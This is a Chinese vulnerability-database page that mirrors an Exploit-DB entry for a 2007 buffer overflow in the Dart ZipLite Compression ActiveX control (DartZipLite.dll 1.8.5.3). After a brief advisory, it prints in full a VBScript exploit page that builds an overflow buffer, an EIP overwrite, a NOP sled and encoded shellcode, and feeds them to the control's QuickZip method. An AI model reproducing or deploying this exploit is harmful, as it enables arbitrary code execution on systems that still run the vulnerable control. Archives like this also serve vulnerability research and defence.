Dart ZipLite Compression 1.8.5.3 - 'DartZipLite.dll' ActiveX Control Buffer Overflow

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056254 漏洞类型
发布时间 2007-05-22 更新时间 2007-05-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/30069
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/24099/info

The Dart ZipLite Compression ActiveX control is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Dart ZipLite Compression ActiveX control 1.8.5.3 is vulnerable to this issue; other versions may also be affected. 

<pre> <span style="font: 14pt Courier New;"><p align="center"><b>2007/05/22</b></p></span> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------------------------- <b>Dart ZipLite Compression for ActiveX (DartZipLite.dll v. 1.8.5.3) Local Buffer Overflow Exploit</b> url: http://www.dart.com/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Special thanks to <b><font color=red>rgod</font></b> that found the bug in DartZip.dll for his exploit see <a href="http://retrogod.altervista.org/ie_DartZip_bof.html">http://retrogod.altervista.org/ie_DartZip_bof.html</a> ------------------------------------------------------------------------------------------------- <object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE00D4DD' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language = 'vbscript'> Sub tryMe() buff = String(1024, "A") get_EIP = unescape("%EB%AA%3F%7E") buff1 = String(28, "A") nop = String(16, unescape("%90")) shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + buff1 + nop + shellcode + nop test.QuickZip egg, "default", True, True, "default", 1 End Sub </script> </span></span> </code></pre>